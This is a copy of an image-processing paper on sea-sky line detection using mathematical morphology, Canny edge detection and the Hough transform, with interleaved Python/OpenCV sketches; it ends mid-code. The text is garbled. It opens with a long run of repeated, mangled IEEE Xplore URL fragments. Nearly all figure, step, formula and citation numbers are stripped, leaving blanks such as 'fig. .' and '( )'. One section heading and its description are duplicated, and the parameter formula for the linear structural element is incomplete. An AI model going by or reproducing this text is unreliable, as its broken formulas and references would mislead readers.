fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% 
fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% 
fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% 
fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= 
the new method of sea-sky line detection based on mathematical morphology

zhang wenqi, bai wanmin, yu jun, gao shouyi
school of computer science and engineering, xi'an technological university, xi'an, china
international journal of advanced network, monitoring and controls, volume , no. , doi: . /ijanmc- -

abstract—to solve the problem of the low accuracy and robustness of sea-sky line detection, this paper presents a sea-sky line detection method based on mathematical morphology. firstly, a mathematical-morphology closed-open operation is used to filter and denoise the sea-sky image.
then the canny operator is used to obtain the sea-sky boundary of the image, and a mathematical morphological operation is applied to remove the remaining disturbance points. finally, the sea-sky line is detected by the hough transform. the experimental results show that the algorithm can accurately and efficiently detect the sea-sky line against a complex sea-sky background.

keywords: sea-sky line; mathematical morphology; edge detection; hough transformation

i. introduction

the sea-sky line is the dividing line between the sea and the sky. in general, an image with a sea-sky background mainly includes three regions: the brighter sky area, the darker sea area, and the sea-sky line area that transitions from light to dark [ ]. in low-altitude reconnaissance, a target on the sea usually appears in the area of the sea-sky line. detecting the sea-sky line therefore reduces the amount of computation required for target detection and shortens the computation time. at the same time, it separates the sky area from the sea area, which is meaningful for simulation experiments on target detection at sea.

sea-sky line detection is strongly influenced by the marine environment. the main influencing factors are as follows: (1) strong watermark interference caused by waves, which makes the gray value of a wave close to the gray value of pixels on the sea-sky line and makes its extraction difficult; (2) background objects such as mountains and ships, which interfere with the detection of the sea-sky line; (3) low atmospheric visibility, which blurs the sea-sky boundary and makes the sea-sky line difficult to detect. to detect the sea-sky line accurately, its characteristics need to be understood: (1) the sea-sky line area lies between the sky and the sea; its brightness variation is more intense than in the other two regions, with the grayscale changing strongly in the vertical direction and slowly in the horizontal direction. (2) the sea-sky line is usually not a straight line but a gradually changing band.

at present, there is a considerable literature on sea-sky line detection. for example, liang d and others use otsu segmentation and clustering to detect the sea-sky line [ ]; because the otsu segmentation algorithm cannot accurately segment sea-sky background images with unbalanced illumination, the detection fails on this kind of image. h. wang and others combine the sobel operator with straight-line fitting to detect the sea-sky line [ ]; this method can extract the sea-sky line against a simple background, but it is difficult to obtain a satisfactory result in complicated situations. wang bo and others use gradient-saliency region growing to detect the sea-sky line [ ], but sea-surface splash and waves interfere with the image gradient calculation. for complex sea conditions, these methods are therefore limited to a certain degree.

to improve the robustness and accuracy of sea-sky line detection, a sea-sky line detection method based on mathematical morphology is proposed. this method improves the robustness of detection against a complex sea-sky background. mathematical morphology is used to denoise the sea-sky images and remove interference points, which reduces computation and improves the accuracy of sea-sky line detection.
ii. mathematical morphology

mathematical morphology is a nonlinear image processing and analysis theory. it is characterized by geometrical methods, which makes it well suited to processing and analyzing visual information. the basic idea of mathematical morphology is to probe the target image region with structural elements of a certain form, measuring how they fit or fill the region, and thereby to extract the essential morphological characteristics of the image for analysis and recognition. mathematical morphology can eliminate morphological and structural attributes that are irrelevant in the target image while retaining its essential morphological and structural properties, thereby simplifying the image data; it has a naturally parallel structure and is easy to implement in hardware, which greatly improves the speed of image analysis and processing. at present, mathematical morphology is widely used in pattern recognition, machine vision, microscopic image analysis, medical image processing, computing and data processing, and so on. it has clear advantages in image processing problems such as filtering and noise reduction, image enhancement, edge detection, image segmentation, feature extraction, texture analysis, image restoration and reconstruction, and image compression.

a. the mathematical morphology operations

mathematical morphology consists of a set of morphological algebraic operators whose basic operations are expansion (dilation), corrosion (erosion), opening, and closing. these operations behave differently on binary and grayscale images [ ]. the basic operations can be combined and derived into various practical morphological algorithms, which can be used to analyze and process the shape and structure of an image. the most basic morphological transformations are expansion and corrosion, which can realize many functions such as filtering noise, separating independent elements, and bridging adjacent elements in the target image. mathematical morphology can also be used to find the maximum or minimum regions of distinct blocks in the target image and to obtain the gradient of the image. the expansion operation computes a local maximum, while the corrosion operation computes the local minimum of the pixels in a neighborhood; the two operations are mutually dual [ ]. expansion expands edges outward; it can fill small holes in the target image and turn background edge pixels into target pixels, so the target grows and the background shrinks. corrosion removes irrelevant edge points and shrinks edges inward; it can eliminate small protrusions in the target image, so the target shrinks and the background grows. the other morphological operations, such as opening and closing, are composed of these two basic transformations [ - ]. let f(x, y) be an input image and b(x, y) a structural element.
the structural element b is used to probe the input image f(x, y). formula (1) defines the expansion operation and formula (2) defines the corrosion operation.

definition 1: the image f is expanded by the structural element b, written $f \oplus b$:

$[f \oplus b](x, y) = \max_{(s, t) \in b} \{ f(x - s, y - t) \}$    (1)

definition 2: the image f is corroded by the structural element b, written $f \ominus b$:

$[f \ominus b](x, y) = \min_{(s, t) \in b} \{ f(x + s, y + t) \}$    (2)

based on the two basic morphological transformations of expansion and corrosion, many mathematical morphological operators can be constructed, among which the open and closed operations are the two basic ones [ - ]. the open operation first corrodes the image and then expands it, as shown in formula (3); the closed operation first expands the image and then corrodes it, as shown in formula (4).

definition 3: the image f is opened by the structural element b, written $f \circ b$:

$f \circ b = (f \ominus b) \oplus b$    (3)

definition 4: the image f is closed by the structural element b, written $f \bullet b$:

$f \bullet b = (f \oplus b) \ominus b$    (4)

fig. 1 illustrates these operations: (a) is a square structural element, (b) is the target matrix to be processed, (c) is the result of corroding the matrix in (b) with the element in (a), and (d) is the result of expanding the matrix in (b) with the element in (a).

figure 1. the mathematical morphology operations: (a) structural element, (b) target matrix, (c) corrosion operation, (d) expansion operation.

the open operation can remove isolated points, burrs, and small bridges (small points connecting two blocks); it can be used to separate large regions and smooth their edges while keeping the overall position and shape unchanged. the closed operation can fill small holes in an object and stitch small cracks so as to connect adjacent objects and smooth edges, again while keeping the overall position and shape unchanged. the open and closed operations are also a pair of dual operations. the closed operation fills low-grayscale black holes, whereas the open operation suppresses high-grayscale white points (noise). performing the closed operation first and then the open operation gives better denoising and smoother edges; therefore, the closed-open operation is chosen in this article to filter and reduce the noise of the sea-sky images.
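as a concrete illustration of formulas (1)-(4) and of the closed-open combination adopted above, the following python/opencv sketch applies the four basic operations to a grayscale sea-sky image; the image path and the 5 x 5 square structural element are illustrative assumptions rather than values taken from the paper.

```python
# a minimal sketch of the basic grayscale morphology operations, assuming a
# hypothetical input file "sea_sky.png" and a 5x5 square structural element.
import cv2

img = cv2.imread("sea_sky.png", cv2.IMREAD_GRAYSCALE)

# square structural element b
b = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))

dilated = cv2.dilate(img, b)                        # expansion: local maximum, formula (1)
eroded = cv2.erode(img, b)                          # corrosion: local minimum, formula (2)
opened = cv2.morphologyEx(img, cv2.MORPH_OPEN, b)   # open: corrode then expand, formula (3)
closed = cv2.morphologyEx(img, cv2.MORPH_CLOSE, b)  # close: expand then corrode, formula (4)

# closed-open combination: close first to fill dark holes,
# then open to suppress bright noise points
closed_open = cv2.morphologyEx(closed, cv2.MORPH_OPEN, b)
```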
b. selection of structural elements

any mathematical morphology algorithm involves two basic problems: the morphological operations and the selection of the structural element. since the definition of mathematical morphology fixes the operation rules, the selection of the structural element determines the purpose and effect of a morphological algorithm. the determination and optimization of structural elements have therefore long been a hot and difficult topic in the study of mathematical morphology.

the choice of the morphological structural element covers two aspects: its size and its shape. generally speaking, a structural element must be geometrically simpler than the original image and bounded; its convexity is also important. following these selection principles, small simple sets such as squares, diamonds, and circles are usually chosen. fig. 2 shows some examples of structural elements, and a short construction sketch follows below.

figure 2. examples of structural elements: (a) linear, (b) rhombic, (c) rectangular, (d) square.

if the structural element is not chosen properly, the image cannot be processed effectively and the result will not have the desired effect. there are mainly two such cases. (1) when the selected structural element is too small, the open operation cannot effectively eliminate larger high-grayscale noise points, and larger low-grayscale black holes cannot be effectively bridged by the closed operation. (2) when the selected structural element is too large, on the one hand the open operation excessively removes pixels on the image edges and causes false breaks, and on the other hand the closed operation over-merges black holes and generates interference information [ - ]. therefore, using structural elements of a single size easily leads to inaccurate edge localization in the target image and an unsatisfactory denoising effect. in addition, because of the constraint relations along image edges and the random nature of image noise, when a single structural element is used to probe the target image, a point with a geometric shape similar to an edge point can always be found near the true edge points; thus extracting edges with a single morphological structural element does not effectively preserve the edge segmentation information of the image. consequently, if structural elements of a single size and shape are used when extracting the sea-sky line from the target image, the localization is inaccurate, the denoising effect is not ideal, and the detailed information of the sea-sky line cannot be preserved effectively. in conclusion, this paper adopts multi-scale, multi-shape structural elements to process the sea-sky images.

iii. sea-sky line detection algorithm design

the sea-sky line detection algorithm in this paper is based on mathematical morphology; the overall flow is shown in fig. 3. firstly, the sea-sky image is preprocessed: mathematical morphology is used to filter the target sea-sky background image and to suppress interference around the sea-sky line. secondly, the canny operator is used to extract the sea-sky boundary from the preprocessed image, after which mathematical morphology is applied again to remove interference points, making the sea-sky line detection more efficient and accurate. finally, hough line detection and least-squares line fitting are used to obtain the final sea-sky line.
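to make the discussion of element shape and size concrete, the sketch below constructs several structural elements with opencv; the specific sizes are illustrative assumptions, and opencv's cross-shaped element is used as the closest built-in analogue of the rhombic element in fig. 2.

```python
# a small sketch of constructing structural elements of different shapes and
# sizes; all sizes here are illustrative assumptions.
import cv2
import numpy as np

square = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))      # square element
rectangle = cv2.getStructuringElement(cv2.MORPH_RECT, (9, 3))   # rectangular element
cross = cv2.getStructuringElement(cv2.MORPH_CROSS, (5, 5))      # cross element (rhombus-like)
ellipse = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (7, 7))  # circular element

# a horizontal linear element (1 x 15), similar in spirit to matlab's strel('line', ...)
line = np.ones((1, 15), dtype=np.uint8)
```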
iii. sea-sky line detection algorithm design

the sea-sky line detection algorithm in this paper is based on mathematical morphology; the overall flow is shown in fig. . firstly, the sky-sea image is preprocessed: mathematical morphology is used to filter the target sea-sky background image and to remove the interference affecting the sea-sky line. secondly, the canny operator is used to extract the sea-sky boundary of the preprocessed image. mathematical morphology is then used again to remove the interference points, so that the sea-sky line detection becomes more efficient and accurate. finally, hough line detection and least-squares linear fitting are used to obtain the final sea-sky line.

[figure . overall flow chart: image preprocessing, edge extraction, interference point removal, hough line detection and line fitting; the chart contrasts the algorithm in this paper with the usual algorithm]

step : the image is preprocessed to solve the interference problems caused by the strong watermark and by uneven illumination; the structural elements used for the closed and open operations here are square structural elements.

step : the canny operator is used to extract the edges of the preprocessed sea-sky picture.

step : mathematical morphology is applied to remove the interference points, so that the sea-sky line detection becomes more efficient and accurate; the structural element used here is a linear structural element.

step : hough straight-line detection and least-squares fitting are used to obtain the sea-sky line.

the following subsections describe the major steps: morphological image preprocessing, interference point elimination, and hough line detection.

a. image preprocessing

during the initial image collection, noise is inevitable because of optical system distortion, relative motion, weather and other factors; during transmission, noise further pollutes the image, and noise points have a harmful effect on edge detection [ ]. the gauss filter is generally used to remove such noise. this paper, however, uses a mathematical morphology filter to preprocess the image, which makes the brightness of the target image more uniform and removes the interference of the watermark, while better preserving the structural gradient information of the image. a closed-open filter (cof) is constructed by combining the closing and opening operations; its definition is given in formula ( ):

$\mathrm{cof}(f) = (f \bullet b) \circ b$   ( )

the mathematical morphological filter has the properties of transitivity, translation invariance, idempotency and duality. a relatively large square structural element is chosen here, because the disturbances caused by uneven illumination and by the strong watermark are large.

b. edge detection

edge detection with the canny operator is a technique for extracting useful structural information from different visual objects, and it greatly reduces the amount of data to be processed; it is now widely used in computer vision systems. although canny operators are applied in different visual systems, the requirements on edge detection are similar, which is why the technique is so widely applicable [ ]. for the grayscale image preprocessed in step , the gradient intensity and direction of each pixel are calculated. since image edges may point in any direction, the canny algorithm uses four operators to detect horizontal, vertical and diagonal borders. the edge detection operator returns the first-order derivatives in the horizontal direction, $g_x$, and in the vertical direction, $g_y$, from which the gradient magnitude g and the direction $\theta$ of each pixel are determined, as shown in formulas ( ) and ( ):

$g = \sqrt{g_x^2 + g_y^2}$   ( )

$\theta = \arctan(g_y / g_x)$   ( )

in formula ( ), g is the gradient strength; in formula ( ), arctan is the inverse tangent function and $\theta$ represents the gradient direction. non-maximum suppression is then applied to eliminate the spurious responses caused by edge detection, double-threshold detection is used to determine the real and potential edges, and edge detection is completed by suppressing isolated weak edges. the canny operator is used for edge extraction so that all possible edges are obtained, which guarantees the accuracy of the edges.
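a minimal opencv sketch of the preprocessing and edge-detection steps described above; the input file name, the kernel size and the canny thresholds are assumptions chosen only for illustration, not values taken from the paper.

```python
import cv2
import numpy as np

def closed_open_filter(img, ksize=15):
    # closed-open filter of formula ( ): close first (fill dark holes),
    # then open (suppress bright specks); a fairly large flat square element
    # is used because the watermark / illumination disturbances are large
    b = np.ones((ksize, ksize), dtype=np.uint8)
    closed = cv2.morphologyEx(img, cv2.MORPH_CLOSE, b)
    return cv2.morphologyEx(closed, cv2.MORPH_OPEN, b)

gray = cv2.imread("sea_sky.png", cv2.IMREAD_GRAYSCALE)  # hypothetical input
filtered = closed_open_filter(gray)

# gradient magnitude and direction, as in formulas ( ) and ( )
gx = cv2.Sobel(filtered, cv2.CV_64F, 1, 0)
gy = cv2.Sobel(filtered, cv2.CV_64F, 0, 1)
grad = np.hypot(gx, gy)
theta = np.arctan2(gy, gx)

# canny performs gradient computation, non-maximum suppression and
# double-threshold hysteresis internally
edges = cv2.Canny(filtered, 50, 150)
```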
c. interference point removal

after the canny operator extracts the edges, binary images are obtained. these binary images still contain many small noise points, which interfere with the subsequent detection and fitting of the sea-sky line. mathematical morphology is therefore used to remove these interference points. because morphological operations are sensitive to the size and shape of the structural element, an appropriate element must be selected. since the target is the sea-sky line, a linear structural element is used to remove the noise points, so that the interference points are eliminated while the edge points of the target are not removed by mistake [ ]. the linear structural element used in this paper is given in formula ( ):

$se = \mathrm{strel}(\text{'line'},\, x,\, y)$   ( )

in formula ( ), se denotes the structural element and strel() is the function that creates it; 'line' indicates a linear structural element, while x and y determine the size and the direction of the chosen element. the relationship between x and y is given in formula ( ): x takes positive integer values n = , , ... and sets the length of the element, while y = n·q (n = , , ...) is an integer multiple of the unit angle q = /(n − ) and sets the direction of the element.

according to the characteristics of the sea-sky line, this paper selects linear structural elements, which can effectively remove interference points, reduce the amount of calculation in the hough line detection, and improve its accuracy and efficiency.

d. line detection

the basic idea of the hough transformation is the duality between points and lines: after the transformation, the content of the image space is mapped into the parameter space [ ]. in the x-y image space, a straight line $y = ax + b$ (where a is the slope and b the intercept) corresponds to a point in the $\rho$-$\theta$ parameter space.

[figure . the image space]

a point on a straight line in the image space corresponds to a sinusoidal curve in the hough parameter space; many points on the same line in the image space form a cluster of sinusoids in the parameter space, and these curves intersect at one point, which is called the peak point. the peak point in the hough parameter space corresponds to a straight line in the image space. fig.  shows the image space and fig.  shows the parameter space; the hough transformation converts the image space of fig.  into the parameter space of fig. .

[figure . the parameter space]

therefore, the hough transformation turns the problem of detecting straight lines in the image space into the problem of detecting points in the parameter space. there are many possible lines in a sea-sky image, but the sea-sky line runs across the whole image; it is therefore the longest line segment in the image and corresponds to the local maximum in the hough parameter space. by detecting the local maximum in the hough parameter space, the corresponding line in the x-y image space, that is, the sea-sky line, can be found [ ].
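a possible opencv sketch of steps  and : opening the canny edge map with a near-horizontal linear element and then running the probabilistic hough transform, followed by a least-squares fit through nearby edge pixels. the element length, the hough parameters and the distance band are illustrative assumptions, and the variable edges is assumed to come from the preprocessing sketch above.

```python
import cv2
import numpy as np

# near-horizontal linear structural element (an opencv analogue of
# matlab's strel('line', x, y) for a horizontal orientation)
line_se = np.ones((1, 15), dtype=np.uint8)

# opening with the linear element keeps long horizontal edge runs such as
# the sea-sky line and removes small isolated interference points
cleaned = cv2.morphologyEx(edges, cv2.MORPH_OPEN, line_se)

# probabilistic hough transform; the longest returned segment is taken as
# the sea-sky line candidate (the local maximum in parameter space)
segments = cv2.HoughLinesP(cleaned, rho=1, theta=np.pi / 180, threshold=80,
                           minLineLength=100, maxLineGap=10)
if segments is not None:
    longest = max(segments[:, 0, :],
                  key=lambda s: np.hypot(s[2] - s[0], s[3] - s[1]))
    x1, y1, x2, y2 = longest

    # least-squares fit (step 4): collect the edge pixels lying close to the
    # detected segment and fit y = a*x + b through them
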